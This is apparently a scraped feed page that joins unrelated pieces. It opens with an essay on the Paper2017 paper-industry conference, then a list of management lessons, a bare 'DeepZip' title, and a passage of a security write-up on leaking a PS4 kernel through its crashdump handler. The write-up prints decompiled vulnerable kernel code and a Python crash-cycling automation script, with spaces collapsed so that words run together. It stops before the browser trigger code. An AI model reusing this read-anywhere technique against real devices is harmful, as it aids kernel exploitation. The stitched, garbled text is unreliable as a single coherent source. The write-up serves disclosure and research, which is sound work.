The Superfine story is personal for Ted. George Morrison was his great uncle. His grandfather, George O’Connor, started the company when he acquired an old paper mill at the confluence of the Hudson and Mohawk rivers in upstate New York. Ted’s father, Tom Sr, took over in 1972. Now, his brother, Tom Jr, runs the fourth-going-on-fifth-generation paper company.

Once Ted finishes the story, we talk about the paper industry – where it’s been and where it’s going. “Years ago, when I used to go to these types of meetings with my father, there were probably 16 mills – Strathmore, Hopper, Rising, Simpson, Mohawk, Beckett … We’d talk about trends in the industry and distributors and things like that, and, um … ” He stops to reflect. “They’re all gone.”

He lets that sink in for himself.

“Because they sat there and made just what they made for 30 years, and it kind of gets obsolete.”


“Paper is Good.” So reads the packaging on a ream of 8.5in by 11in, 20lb, white (92 on Tappi’s T-452 brightness scale), acid-free, curl-controlled, ColorLok Technology®, elemental chlorine-free, Rainforest Alliance Certified™, Forest Stewardship Council® certified, Sustainable Forestry Initiative® Certified, Made in USA Domtar EarthChoice® Office Paper. “Great ideas are started on paper,” the packaging reads. “The world is educated on paper. Businesses are founded on paper. Love is professed on paper. Important news is spread on paper.”

Domtar is right: paper has played “an essential role in the development of mankind”. And yet, for decades, civilisation has been trying to develop beyond paper, promoting a paper-free world that will run seamlessly, immaterially on pixels and screens alone. How did paper get here? Where does it go next? For that matter, why is paper – which does its job perfectly well – compelled to keep innovating?

On 26 March, I step into The Tallest Building in the World with an All-Concrete Structure, ready to find out. Billed as “THE annual networking event for the paper industry”, Paper2017 consists of just three panels and presentations across its three-day agenda. The rest of the time is dedicated to what are called “suites” – well-appointed hotel rooms that serve as basecamp, conference room and informal networking space all in one. Alas, because I am a journalist with zero interest in selling or being sold anything, I score only a few suite dates in my time at Paper2017. Instead, I spend a good amount of my time in a communal catch basin of sorts called the “connections lounge” (CL).

A paper mill in Minnesota. Photograph: Alamy

The CL is a great place to sip $5 cups of coffee and thumb through the latest issue of the Paper2017 Convention Daily, published in three separate editions for each day of the conference, and printed on obscenely large 16in by 11.75in glossy tabloid that serves as an oversized “screw you” to palm-sized devices. It is printed by O’Brien Publications, which also publishes PaperAge magazine, the newspaper of record for all things pulp and paper since 1884.

I stroll through the CL, drawn to an unmanned National Paper Trade Association table piled high with juicy-looking literature on paper’s many virtues. I take one of each and sit down at a cocktail table to thumb through my haul of brochures announcing paper “myths” and paper “facts”. Above, the glass beads of a chandelier sway almost imperceptibly in the air conditioning.

A tall, thin man introduces himself to me as Neil. “So, what brings you to Paper2017?” he asks. I give my thumbnail sketch – journalist, piece about paper, etc. And now it’s his turn: something something something cloud-based software, something something business intelligence analytics, something something manufacturing profitability improvements. Later I would see Neil approach at least three other tables, on the prowl for potential clients. He tells me he grew up in paper’s Silicon Valley: Wisconsin. His dad worked in the mill and he grew up in company homes. One day a Finnish corporation bought the mill and moved the whole process to Finland, leaving a shuttered plant behind. Neil tells me about his son, who is double-majoring in public policy and English, but who “didn’t tell his dad about the English part”. Dad seems displeased by this: “He made it tougher on himself.” And then, perhaps remembering that he was speaking with a man of letters, he quickly adds: “But, no, I have a lot of affinity for writers, people who write.”


Ts’ai lun, a Chinese eunuch and privy councillor to Emperor Ho Ti, gets the credit for inventing what today we recognise as paper, in AD105. The basic formula remains unchanged. Some fibrous material – rags or wood – is mashed up, mixed with water to make pulp, then strained through a screen. Matted, intertwined fibre remains, held together by the same hydrogen bonds that twist DNA into a helix. This is dried and cut into paper.

The technology spreads from Asia through the Arab world, eventually landing in Europe circa 950. All the glory goes to Gutenberg for his printing press of 1440, but his metal movable type would have been nothing more than an oversized doorstop if there had been no paper for it to press upon. Paper historian Dard Hunter states the case clearly: “If man may now be considered as having reached a high state of civilisation, his gradual development is more directly due to the inventions of paper and printing than to all other factors.”

It is all the more shocking, then, how many times paper’s death knell has tolled through the halls of universities, corporations, governments, newsrooms and our own homes. Like fusion power, the paperless world has been just a decade away for the past half century, approaching but never arriving.

In the mid-70s, Businessweek published an article by the head of Xerox’s research lab that is credited for first putting down (on paper) a vision of a paperless “office of the future”. It painted a not-incorrect picture of future workers going about their business accessing and analysing information on screens. And yet paper continued its ascent: global consumption grew by 50% between 1980 and 2011.

On the factory floor at a paper mill in South Carolina. Photograph: Bloomberg via Getty

Why? Abigail J Sellen and Richard HR Harper, respectively a principal researcher at Microsoft Research Cambridge and co-director of Lancaster University’s Institute for Social Futures, have a few solid theories. First, they note that computers and the internet brought unprecedented access to information – information that, while accessed digitally, was still best consumed on dead trees. Second, printing technology became so small, cheap and reliable that just about anybody with a computer could also afford their own on-demand press.

“We have heard stories of paperless offices, but we have never seen one,” Sellen and Harper wrote in their book The Myth of the Paperless Office. “More commonly, the introduction of new technology does not get rid of paper; it increases it or shifts the ways in which it is used.” The catch here is that the book was published in 2002, just before luminous smartphone screens took a hold of the same paleomammalian cortex that steered early Homo sapiens toward fire’s glow.

Since then, screen resolutions, load times and user interfaces have improved dramatically, striving toward a functional ideal that, ironically, looks and feels a lot like paper. Just this year, a startup called reMarkable launched a tablet that offers “the most paper-like digital writing experience ever”. Technology is a snake that eats itself.

And yet! Still no paperless world.


By 9.54am on day two of Paper2017, the CL has reached peak capacity and peak caffeination. Old friends are reconnecting, deals are being done. I’m sitting alone at the cocktail table, waiting for my next suite rendezvous. I see the strictly enforced lanyard-wearers-only policy being strictly enforced on a trio of lanyardless suits. My official lanyard notwithstanding, I feel guilty taking up increasingly rare deal-making space. Time to stretch the legs.

Out on the sidewalk, I turn around to peer up the length of Paper2017’s homebase, The Tallest Building in the World With an All-Concrete Structure. When the building was completed in 2009, the Chicago Tribune’s architecture critic, Blair Kamin, wrote that it was “not vulgar, respectable enough, but still short of Chicago’s soaring architectural standards”. Kamin was less kind when the building later unveiled a finishing touch: five serifed, all-caps letters, spanning nearly the length of half a football field, spelling out the developer’s name: T-R-U-M-P.

So bad was this sign – slung low on the facade, where no other Chicago building had dared to brand before – that the building’s architect reportedly emailed Kamin to say, “Just for the record, I had nothing to do with this sign!” Kamin called it“as subtle as Godzilla”, and a “poke in the eye”, and pretty much everybody in Chicago agreed. It really is a terrible sign.

Curiously, despite his name hanging hugely on the outside of the building – not to mention printed on every napkin, coffee cup, water bottle, pen and pad of paper inside – Trump is mentioned to me only twice during Paper2017. Once is in terms that remind me of the weeks of pained post-election analysis about how urban elites had failed to heed the struggles of the working class: “When you get out in the rural part of our country, and you see what’s happened … regardless of what your political affiliation is, I can tell you, Donald Trump tapped into something,” says Mike Grimm, CEO of American Eagle Paper Mills in Tyrone, Pennsylvania (population 5,301).

Grimm talks about the role the mill had played in the town’s history. His own great-grandfather, an Italian immigrant, worked in the machine room. Grimm remembers the paper mill’s whistle directing not just the shifts of the mill workers, but also the lives of the town’s residents.

And yet, in 2001, the mill shut down, as its large corporate owner consolidated. It was a blow to the region, but two years later a group of former mill managers pooled their resources and reopened it as American Eagle. “Especially today, when you lose that type of income out of a small town, it just can’t be replaced,” Grimm says.


A non-professional can only take so much discussion of sustainable wood procurement, the neuroscience of touch, “connected packaging solutions” and the potential for using paper sludge and fly ash to offset oil-based polypropylene in plastic composites. Halfway through the conference, I ache for news beyond Paper2017, and start thumbing through the headlines on CNN, Fox News and the New York Times. Regret sinks in immediately. I retreat back to the appropriately mobile-unfriendly PaperAge.com and bathe in the insular warmth of headlines such as “Pratt Industries Officially Opens New Corrugated Box Factory in Beloit, Wisconsin”, “Sonoco-Alcore to Increase Prices for Tubes & Cores in Europe”, and “Mohawk’s Tom O’Connor Jr and Ted O’Connor Earn AIPMM’S 2017 Peyton Shaner Award”. That last article, really just a reprint of a Mohawk press release, contains this lovely remark from a paper industry colleague: “[Tom and Ted] are lions in our industry that represent the first family in paper with old-fashioned values and exciting new products and services that make this crazy business fresh and fun. When the O’Connor family succeeds, we all succeed.”

On the third and final day of Paper2017, the industry’s sobering choices are laid bare before us in two sessions featuring analysts from RISI, a market-research firm that considers itself “the best-positioned and most authoritative global source of forest products information and data”.

In the first session, we learn that the global demand for printing and writing (P&W) paper has been in steady decline since 2008. These are the papers most of us think of when we think of paper: the uncoated mechanicals, the uncoated freesheets and woodfree, the coated mechanicals and coated woodfree, the coated freesheets – ie, what composes directories, paperback books, newspaper inserts, low-end magazines and catalogues, direct (junk) mail, envelopes, brochures, photo printing, menus, posters, stationery, legal forms, and the iconic 8.5in by 11in office copy paper. They are suffering the combined assault of social media, email, tablets, e-billing, e-readers, laptops, smartphones, online forms, banner ads etc. Worldwide demand for P&W paper fell by 2.6% in 2015, according to RISI. Preliminary data suggests it fell by 2.2% in 2016, and RISI forecasts it will continue to fall by another 1.1% in 2017 and 2018.

But there’s more to paper than printing and writing. Market trends session No 2 focused on global paper-based packaging and recovered fibre, where the outlook is much brighter. There is talk of an “Amazon effect”, paired with a slide showing several boxes within boxes and paper padding used to ship one tiny bottle of vitamins. Big Paper is learning to sustain itself by encasing e-commerce gold. The internet taketh away, and the internet giveth.

You’re seeing more paper in food and drink packaging, too. RISI chalks this up to increasingly negative public attitudes toward plastic packaging. Plastic-bag bans and taxes are popping up all over the place. RISI illustrates the trend with a photo of a sea turtle ensnared underwater in plastic wrap.

And then there’s tissue. It may not be the first thing we think of when we think of paper, but Big Paper is indeed very much in the business of selling toilet paper, facial tissue, paper towels and “feminine products” – and business is good. You can’t blow your nose into an email. In the end, we are material. We have inputs and outputs. We require physical receptacles. And more of us are on the way. RISI foresees a 3% annual rise in global tissue demand through 2018, and a 1.4% rise in global paper demand overall.

Even Mohawk, which is firmly planted in the printing and writing segment, is optimistic. “We tend not to listen to all this,” says Ted, back in the Mohawk suite, holding up the Paper2017 program. “Trends and this and that.” He shakes his head dismissively. According to Ted and Tom, Mohawk has been growing by around 3% or 4% a year.

It seems Mohawk might understand something that others in the industry do not. While many larger paper companies were reacting to the prods of market wonks and consultants by reinventing themselves as manufacturers of toilet tubes or Amazon packaging, Mohawk had been doubling down on its original value proposition: making really great paper. Amid the chaos of beeping, buzzing and blinking, Mohawk now stands out as a quiet, focused manufacturer of the world’s simplest publishing platform – one that actually gives its users pleasant haptic associations.

It’s not that Mohawk ignores the digital revolution; rather, they have made a choice to sell the ethos of paper to the digitally fatigued. Melissa Stevens, Mohawk’s senior VP of sales, hands me Mohawk’s Declaration of Craft, an absolutely gorgeous piece of printed material chock-full of new-agey thingness. Its thesis: “In an era of impermanence, an extraordinary movement has emerged. A movement of makers where craftsmanship and permanence matter now more than ever.”

Mohawk’s communication strategy is built around this “maker” movement, which is illustrated with hipsters throwing clay in their basements, forging wrought iron and side-hustling in saxophone design. It’s impossible to tell if this is brilliant marketing or sheer impudence, or both.

The staff of paper company Dunder Mifflin in US sitcom The Office. Photograph: Mitchell Haaseth/NBC Universal, Inc.

My mind keeps returning to one particular episode of the The Office, the great sitcom that followed (in its US version) the employees of Dunder Mifflin, a small paper sales company in Scranton, Pennsylvania. Pam Beesly, the receptionist, is having a bad day. The handful of friends and co-workers who have shown up for her art show mostly just yawn at her still lifes and exurban landscapes. One character dismisses it as “motel art”. But just as Pam is about to leave, her boss, Michael Scott, shows up. He has had a rough day, too – he has been made a fool of by his own subordinates, and by business-school students smugly assured of paper’s doom.

Pam’s art mesmerises Michael. “My God, these could be tracings,” he says, pure of heart. He insists on buying her painting of the office. Pam’s eyes grow wet. So do Michael’s. “That is our building,” he says, “and we sell paper.”

It is the best scene in the series. I watch it, and I feel the victory of earnestness over a world of naysayers. We cut to Michael back at Dunder Mifflin, hanging the painting of the office in the office on The Office. “It is a message,” he says. “It’s an inspiration. It’s a source of beauty. And without paper, it could not have happened … ”

He pauses to consider this. “Unless you had a camera.”


Imagine that, instead of paper, the computer and all its accoutrements came first. In a flash of divine perception, a Chinese castrate under Ho Ti’s reign conceives of binary systems, electronic circuits, vacuum tubes, capacitors, Boolean logic, transistors, integrated circuits, microprocessors, keyboards, floppy disks, CD-ROMs, zip drives, HTML, CSS, Javascript, modems, routers, email, wifi, AoL, Google, Friendster, Napster, Myspace, Facebook, Twitter, gifs – all at once. And so, for nearly two millennia, the human race lives in a paperless, digital world.

Then, sometime in the middle of the 20th century, scientists at MIT, Stanford and the US Department of Defense begin to search for a better way to store and share their ideas. They experiment with mashing up old rags and wood to mix with water, draining the mixture through a screen and drying the matted fibres into sheets. The breakthrough makes its way into civilian life, and by the turn of the millennium most people in the developed world carry a pad of paper in their pocket.

Perhaps, in this version of events, we would regard paper as the superior technology, and not just because of novelty. After all, paper loads instantly. It requires no software, no battery, no power source. It is remarkably lightweight, thin and made from abundant, recyclable materials. Its design is minimalist, understated, calm.

Throughout Paper2017, people try to convince me (and perhaps themselves) that the Office-inspired stereotype of paper as aloof and backwards is wrong. Paper isn’t boring, they tell me; in fact, it’s an “exciting time for the industry”. They coopt the technophile’s word cloud – “innovative”, “disruptive”, “smart”.

And yet, at the very same time that it tries to showcase its innovative credentials, paper is also promoting a nostalgic counter-narrative, filled with references to family, American values and smalltown workers. Not unlike that of coal mines or auto plants, this story imagines paper mills as monuments to the fading promise of American industry.

Paper will survive in some form (packaging, toilet paper etc) and so, I’d wager, will both of these narratives. Meanwhile, as writers like me fret about the battle between digital and paper, the industry is shifting, like so many others, from a steady stable of family-run mills to a business model that breeds perpetual uncertainty, interpreted by consultants and navigated by anomalous corporate marketing entities. Behind all the optimistic talk of restructuring opportunities and rebranding initiatives, traditional careers in American paper are vanishing: according to the New York Times, Wisconsin alone has lost 20,000 paper factory jobs since 2000.

There aren’t many representatives at the conference of workers like Neil’s dad, who had actually manned those mills for generations; there are, however, plenty of consultants like Neil, who speak the language of metrics and markets effortlessly. I used to believe, probably like most people, that paper was just a simple canvas for my ideas. By the end of Paper2017, I want to believe that making paper could be everything: an artisanal craft and a family-run business and a developing-world growth opportunity and a packaging revolution. Yet I can’t help noticing how familiar are the marketing creeds I hear over and over at the conference: a 21st-century blend of techno-speak, nostalgia and nonsense.


The other time someone at Paper2017 mentions to me the man whose name hangs on the side of The Tallest Building in the World with an All-Concrete Structure is on the conference’s final morning. A friendly man from Belgium with a South Asian accent plops down in the armchair across from me, just outside the CL. I had met him briefly on the first day of the conference, and when I idly remark that there seems to be a lot of excitement in the paper industry these days, he quickly replies: “Excitement? Or fear?”

The man has some cursory relation to paper – he is in the import/export business – but it is a bit foggy to me. When we get on to the topic of technology, disruption and automation, he paints a much bleaker picture than I heard in any of my other conversations at Paper2017. Robots will one day replace truck drivers, and then chefs, and then even your primary-care physician, he says, absently spinning his smartphone between his left thumb and forefinger. In that case, I ask, what do you tell your children about their future career prospects?

“Be a salesperson,” he says. “If there is artificial intelligence, then they will be selling the robots.” He winks and smiles, and flips his smartphone again. “This is how it will be.”

I must look uneasy about all this, because he then tries to reassure me. He points to Europe as an example of a place where governments are getting ahead of this trend, requiring that employers pay extra into social security if they replace a human worker with a machine. He says he knows less about the situation in the US, but feels things would be OK.

“You have a nice president who is a businessman,” he says. “He’s not a politician. There is profit or loss in business, so you either win or lose. Some people don’t like that, but I think it will be good.”

A longer version of this article first appeared in The Point magazine

Follow the Long Read on Twitter at @gdnlongread, or sign up to the long read weekly email here.

Things I have learnt as the software engineering lead of a multinational

$
0
0

A surprisingly long cycle has just closed for me and I think it’s a good time to share some lessons learned.

I have been collecting these points in the last six months, but none of them popped up recently, they have taken shape over a few years and they include both things I did and that I failed to do.

Most of these points act as a personal reminder as well as a set of suggestions to others; don’t be surprised if some of them read cryptic.

So, here it is. A summary of what I learnt in the last six years :

The productive organization

1. When the plan is foggy, that’s the moment to communicate as broadly as possible. In fact you should not frame it as a plan, you frame it as the situation and the final state you want to achieve. When you have a detailed plan, that’s when you DON’T need to communicate broadly. So, clearly state the situation and clearly state the foggy goal to everyone who will listen.

2. Don’t be prudish. If you fear that people will lose faith in you because of the foggy goals and dire situation statement you are painting yourself in an heroic corner. People just need to hear and share the situation they are into. Having a common understanding will act as bonding among them and with you, which is actually all you need to make them work out the right answers.

3.  Don’t assume that a specific communication medium can’t be effective. Mass emails and top-down communication are not taboo: just because most such communications are irrelevant it doesn’t mean yours will be perceived as such.

4.  Teams don’t self-organize unless you organize them to do so.

5.   Fostering personal initiative in every developer requires showing the vital need for personal initiative. These are birds that mostly don’t fly out of the cage just because you open the door. You must find a way to show them that the cage is burning.

6.  People sitting side-by-side can communicate less than people sitting a continent away. Communication is a chemical reaction that requires catalysers, the thing you get by co-locating people is lowering the cost of the catalysers, but no setup creates automatic communication.

7.  Within a development organization both good and bad communication exist, but they are not a function of politeness or rudeness, it’s much more a matter of clarity and goals. You need to learn what the good kind of communication looks like, find some examples and use them as a reference for everyone.

8.  Fire people whenever you can. There’s often someone to fire, but not many opportunities to do so. When you are given a lot of opportunities to fire people, it is often due to a crisis situation and you’ll likely fire or otherwise loose the wrong people. People appreciate when you fire the right people, so don’t worry about morale. Also, the average quality of people tends to grow more when dismissing than when recruiting.

9.  Hire only for good reasons. Being overworked is not a good reason to hire. Instead, hire to be ready to catch opportunities, not to survive the current battles.

10.  It’s often better to loose battles than to staff desperately and win desperate battles at all costs (World War I anyone?).

11.  Don’t export recruitment, recruitment must be the direct responsibility of everyone in the organization.

12. People must select their future colleagues, there are infinite benefits in this, but it must not become a conclave. Keep the process in the hands of the people who do the work, but make it as transparent as possible.

13.  Always favor actual skill testing in recruitment. When you don’t feel that you are directly testing the candidate skills you are either not competent enough in that skill or you have switched to just playing a set piece (I call this The Interview Theatre) and you will ultimately decide on a whim. Not good.

14.  Build some of your teams as training and testing grounds for freshmen. Put some of your best people there.

15.  Lack of vision is not agile, it is not data-driven, it is not about ‘taking decisions as late as possible’, it is not something that you should paint out in a positive light at all. It’s just lack of vision, and it’s not good.

16.  Construction work is not a good metaphor for software/product development. Factory work neither. Allied junior-officer initiatives during the first week after the d-day in WWII is probably a good guideline, but it is still not a good metaphor overall and, anyway, not known enough to base your communication on.

Yourself

17.  Train people to do all of the previous points. Including this one.

18.  Don’t shy away from leading without doing, it is unavoidable, so just do it. Then do some work to stay pertinent.

19.  If you are not able to hire and fire people, leave. Or stay for the retirement fund if you can stomach it.

20.  The Sith are right, rage propels. But the Jedi are right, you must not let it control yourself. What nobody tells you is that the rage game is intrinsically tiring and rage will take control as soon as you get too tired, so stop well before.

21.  Write down the situation, for your own understanding just as much as for the others’.

22.  If you feel like you don’t know what you are doing it’s probably because you don’t know what you are doing and that’s bad. Anyway, until you learn you don’t really have much of an alternative. Just don’t let that feeling of desperation numb your ability to learn. It does.

23.  There’s more and more good content to read and absorb on effective organizations. Don’t despair and don’t stop reading.

24.  Don’t let entropy get at your daily routine. Avoid entropy-driven work.

25.  Ask questions to people in order to make sure they understand. Trust people who do the same to you. “Do you understand?” is NOT a valid question.

26.  Avoid having people waiting on you. Don’t create direct dependencies on your work or decisions, make sure people feel that they can take decisions and still stay true to the vision without referring to you (hence the importance of point 1).

27.  Take the time to coach people in depth. Really, spend time with the people who are or have the potential to be great professionals in the organisation.

28.  The time you spend with the people you see most potential in is endorsement enough. Avoid any other kind of endorsement of individuals. Unless you are leaving.

The Entropic Organization

29.  An organization populated by a majority of incompetents has less than zero net-worth : it is able to destroy other adjacent organizations that are not similarly populated.

30.  Incompetence is fiercely gregarious while knowledge is often fractious; the reason for this is that raw ideas transfer more easily through untrained minds than refined ideas transfer through trained minds. There’s a reason why large organisations focus so much on simple messages, pity that difficult problems often have simple solutions that don’t work.

31.  Entropy self-selects. Hierarchical  and other kinds of entropic organizations always favor solutions that survive within entropic organizations. Thus they will favor easy over simple, complex over difficult, responsibility-dilution over empowerment, accountability over learning, shock-therapy over culture-nurturing. This is the reinforcing loop that brings ever-increasing entropy in the system : entropy generates easy decisions with complex and broken implementations, which in turn generate more entropy. An example of easy decision with a complexity-inducing implementation: this scenario “our company does not have a coherent strategy, as such many projects tend to deliver results that are not coherent, hampering the organic growth of our capabilities.” will be answered by the most classic knee-jerk decision-making pattern “we don’t know how to do X, so let’s overlay a new Y to enforce X”, in this case :”Group together strategic projects into a big strategic program that will ensure coherence”. The difficult but simple option will not even be entertained : “let’s discover our real strategy and shape the organization around it.”

32.  Delivery dates have often irrelevant but very simple to understand impacts. Good and bad solutions have dramatic but very difficult to understand impacts. The Entropic Organization will thus tend to make date-based decisions. The Entropic Organization will always worry about the development organization ability to deliver by a given date, never about the ability to find the right solution. There are some very rare cases where delivery date is more important than what you are delivering, but modern management seems to delight in generalizing this unusual occurrence to every situation. People do get promoted for having been able to deliver completely broken, useless and damaging solutions on time. If that’s the measure of project success you can expect dates to rule (even when they continuously slide). After all, if you are not a trained surgeon, and the only thing you are told is that a given surgery should last no more than X hours, guess what will be the one criterium for all your actions during the operation. This showcases the direct link between the constituents incompetence and the establishment of classic Entropic Organization decision-making.

33.  Having a strategy will only go so far when you face the Entropic Organization, since it will be only able to appropriate that strategy at the level of energy (understanding) they can attain, which, being entropic, is very low. This results in something that does not look like a strategy at all : ever seen a two-years old play air-traffic control? He got the basic understanding of “talking to planes”, but that’s it.

34.  Partially isolating the Development Organization to stay effective does not work. Adapting your organization to be accepted by an incompetent background does not work either. What is left in the scope of alternatives is radical isolation supported by the attempt to radical results and crossing fingers for top-management recognition (also known as `Deux-ex-machina for the worthy’) and the top-down sales-pitch (or POC) to the CEO (also known as “He who has the ear of the King…”). But don’t forget : Nemo propheta in patria, so, act and look like an outsider as long as you can.

35.  Growth-shrink symmetry. When an organization grows unhealthily (too fast, for bad reasons or through bad recruitment) it will also shrink unhealthily. When it grows it’s bold and confused, when it shrinks it’s scared and nasty.

36.  Most of the ideas that will pop up naturally from the Entropic Organization are bad in the context of modern knowledge-based work, but possess a superficial layer of common-sense to slide through. Exercise extreme prejudice.

Advertisements

DeepZip: Lossless Compression Using Recurrent Networks [pdf]

Dumping a PS4 Kernel in “Only” 6 Days

$
0
0

What if a secure device had an attacker-viewable crashdump format?
What if that same device allowed putting arbitrary memory into the crashdump?
Amazingly, the ps4 tempted fate by supporting both of these features!
Let’s see how that turned out…

The crash handling infrastructure of the ps4 kernel is interesting for 2 main reasons:

  • It is ps4-specific code (likely to be buggy)
  • If the crashdump can be decoded, we will gain very useful info for finding bugs and creating reliable exploits

On a normal FreeBSD system, a kernel panic will create a dump by callingkern_reboot with the RB_DUMP flag. This then leads to doadump being called, which will dump a rather tiny amount of information about the kernel image itself to some storage device.

On ps4, the replacement for doadump is mdbg_run_dump, which can be called from panic or directly from trap_fatal. The amount of information stored into the dump is gigantic by comparison - kernel state for all process, thread, and vm objects are included, along with some metadata about loaded libraries. Other obvious changes from the vanilla FreeBSD method are that the mdbg_run_dump encodes data recorded into the dump on a field-by-field basis and additionally encrypts the resulting buffer before finally storing it to disk.

Let’s zoom in to a special part of mdbg_run_dump - where it iterates over all process’ threads and tries to dump some pthread state:

voidmdbg_run_dump(structtrapframe*frame){// ...for(p=allproc;p!=NULL;p=cur_proc->p_list.le_next){// ...for(td=p->p_threads.tqh_first;td!=NULL;td=td->td_plist.tqe_next){// ...mdbg_pthread_fill_thrinfo2(&dumpstate,td->td_proc,(void*)td->td_pcb->pcb_fsbase,sysdump__internal_call_readuser);// ...}// ...}// ...}voidmdbg_pthread_fill_thrinfo2(void*dst,structproc*p,void*fsbase,int(*callback)(void*dst,structproc*p,signed__int64va,intlen)){structpthread*tcb_thread;// [rsp+8h] [rbp-408h]u8pthread[984];// [rsp+10h] [rbp-400h]if(!callback(&tcb_thread,p,(signed__int64)fsbase+0x10,8)&&!callback(pthread,p,(signed__int64)tcb_thread,984)){*(_QWORD*)dst=*(_QWORD*)&pthread[0xA8];*((_QWORD*)dst+1)=*(_QWORD*)&pthread[0xB0];}}intsysdump__internal_call_readuser(void*dst,structproc*p,signed__int64va,intlen){constvoid*src;// rsistructvmspace*vm;// rcxintrv;// raxvm_paddr_tkva;// raxsrc=(constvoid*)va;if(va>=0){// if va is in userspace, get a kernel mapping of the address// (note "va" is treated as signed, here)vm=p->p_vmspace;rv=EFAULT;if(!vm)returnrv;kva=pmap_extract(vm->vm_pmap,va);src=(constvoid*)(kva|-(signed__int64)(kva<1)|0xFFFFFE0000000000LL);}rv=EFAULT;if(src&&src!=(constvoid*)-1LL){if(va<0){src=(constvoid*)va;}else{rv=ESRCH;if(!p)returnrv;}// so, this can still be reached even if "va" is originally in kernel space!memcpy(dst,src,len);rv=0LL;}returnrv;}

Above, dumpstate is a temporary buffer which will eventually make it into the crashdump. To summarize, sysdump__internal_call_readuser can be made to function as a read-anywhere oracle. This is because fsbase will point into our (owned) webkit process’ usermode address space. Thus, even without changing the actual fsbase value, we may freely change the value of tcb_thread, which is stored at fsbase + 0x10.
Further, sysdump__internal_call_readuser will happily read from a kernel address and put the result into the dump.

We can now put any kernel location into the dump, but we still need to decrypt and decode it…
Aside from that, there’s also the issue that we may only add 0x10 bytes per thread in this manner…

The crazy news about the encryption of crashdumps isn’t just that they use symmetric encryption - they also tend to use the same keys between firmware versions! This meant that from firmware 1.01 until they somehow realized it was “probably a bad idea” to reuse symmetric keys which could be exposed if the kernel were dumped, only versioned_keys[1] was needed (see Appendix). After that point crashdumps are still useful, however you must dump the kernel once beforehand in order to obtain the keys.

The crashdump encoding (which we know is called “nxdp” from the symbols present in firmware 1.01) is a simple run length encoding derivative, with a few primitive data types supported. A functional parser is at the end of the post (see Appendix).

This seems like quite a bit of effort for some 0x10 bytes per thread, doesn’t it? Wait - it gets better! During testing, I found that I could only make ~600 threads exist concurrently before the browser process would either crash, hang, or just refuse to make more threads. Some simple math:

full_dump_size = 32MB
crashdump_cycle_time = ~5 minutes
thread_per_crashdump_cycle = 600
per_dump_size = thread_per_crashdump_cycle * 0x10 bytes = 9600 bytes
(full_dump_size / per_dump_size) * crashdump_cycle_time = 11 days

11 days… Eventually, I was able to cut the required time down to only 6 days by being a bit more intelligent in choosing which memory ranges to dump. Normally when dumping from software exploits one would just linearly dump as much as possible, which has the advantage of bringing in .bss and other areas which can be handy for static analysis.

With prerequisites for leaking the kernel out of crashdumps taken care of, I set about with automating the procedure such that I could just let it run without thinking about it and come back some days later to a shiny new kernel dump.

Since the ps4 kernel stores the crashdump to the hard drive, I needed a way to either intercept the data in-flight to the hard drive, or rig up some way to read from the hard drive between panic cycles. Conveniently, it was around this time that I heard about the work vpikhur had done on EAP. Details on the EAP hack are out of scope for this post (seehis talk for more details), but suffice it to say that EAP is an embedded processor in the Aeolia southbridge, and vpikhur had figured out how to get persistent kernel-level code exec on it (:D). Using knowledge gained from this hack, I was provided with a replacement EAP kernel binary which would detect crashdumps on the hard drive and shoot them over the network to my PC.

With this capability and some small hardware modifications to connect my ps4’s power switch to the network and simulate input to the ps4 with linux’ usb gadget API, I was able to simply script the entire process (this code ran on my PC and spoke to a web server on a Novena (remote server) to control the ps4):

importrequests,timeimportsocketimportparse_dumpimportstructfromioimportBytesIOimportsys,tracebackremote_server='novena ip'defsend_cmd(cmd):requests.get('http://%s'%(remote_server),headers={'remote-cmd':cmd})defdump_index_get():withopen('dump-index')asf:returnint(f.read())return0defdump_index_set(index):print('setting dump-index to %i'%(index))withopen('dump-index','w')asf:f.write('%i'%(index))defdump_index_increment():index=dump_index_get()dump_index_set(index+1)defprocess_dump(partition_data):nxdp=parse_dump.NXDP(BytesIO(parse_dump.Decryptor(partition_data).data))# uses the most recent thread_info sent to the http server to transpose# the dump data into flat memory dumpsnxdp.dump_thread_leak()defrecv_dump():sock=socket.socket()withsocket.socket(socket.AF_INET,socket.SOCK_STREAM)assock:sock.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)sock.bind(('',1339))sock.listen(1)conn,addr=sock.accept()withconn:magic=struct.unpack('<L',conn.recv(4))[0]ifmagic!=0x13371337:print('bad magic')length,status=struct.unpack('<2L',conn.recv(4*2))ifstatus!=0:print('bad status')data=b''whilelen(data)<length:data+=conn.recv(0x8000)process_dump(data)dump_index_set(dump_index_get())# turn onsend_cmd('power')whileTrue:# boot from healthy state takes ~30 secondstime.sleep(35)# going to browser should load exploit and crash ps4send_cmd('start-browser')# wait for exploit to run and ps4 to power off completelytime.sleep(20)# power on ps4# it will go through fsck (~60secs) and boot to a "send error report?" screen.send_cmd('power')# power must be pressed twice...time.sleep(2)send_cmd('power')time.sleep(60)# fscktime.sleep(35)# power-up# go past "send error report?" screen...send_cmd('ack-crash')# wait for xmb to loadtime.sleep(10)# go to rest mode to let EAP do it's thingsend_cmd('suspend')# wait for data to arrive and process ittry:recv_dump()# after recving all data from EAP, need to wait for reboot (done on loop)# assuming EAP sent data OK, it will reboot by itself into healthy statedump_index_increment()except:# expect that nxdp data was recv'd, but decode fail -> just retry same# positionexc_type,exc_value,exc_traceback=sys.exc_info()traceback.print_exception(exc_type,exc_value,exc_traceback)print('nxdp decode failed, retry')

Triggering the Vulnerability

In order to progressively dump the regions I wanted, I created a simple json schema to record metadata which could be used to tie TIDs to the kernel address which their portion of the crashdump would contain, as well as maintain the base address used per-run (getDumpIndex(), here). Below is the snippet of js executed in the ps4 browser process in order to initiate a crashdump:

